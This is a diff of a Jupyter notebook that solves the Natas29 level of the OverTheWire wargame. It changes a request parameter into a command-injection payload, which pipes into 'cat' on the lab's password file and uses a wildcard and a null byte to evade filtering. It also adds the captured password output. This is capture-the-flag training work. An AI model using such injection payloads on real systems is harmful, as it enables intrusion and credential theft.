--- a/Natas/natas.ipynb
+++ b/Natas/natas.ipynb
@@ -1743,12 +1743,27 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
-    "## Natas29"
+    "## Natas29\n"
    ]
   },
   {
    "cell_type": "code",
-   "execution_count": 97,
+   "execution_count": 23,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "\\x64\n"
+     ]
+    }
+   ],
+   "source": []
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 27,
    "metadata": {},
    "outputs": [
     {
@@ -1800,6 +1815,7 @@
       "</div>\n",
       "</body>\n",
       "</html>\n",
+      "WQhx1BvcmP9irs2MP9tRnLsNaDI76YrH\n",
       "\n"
      ]
     }
@@ -1809,11 +1825,12 @@
     "count = 29\n",
     "init()\n",
     "\n",
-    "param = {\"file\": \"perl underground 6\"}\n",
+    "param = {\"file\": \"|cat /etc/na*as_webpass/na*as30\\x00\"}\n",
     "url = \"http://natas29.natas.labs.overthewire.org/index.pl\"\n",
     "res = requests.get(url, auth=auth, params=param)\n",
     "\n",
-    "print(res.text)"
+    "print(res.text)\n",
+    "find_pwd(res)"
    ]
   }
  ],
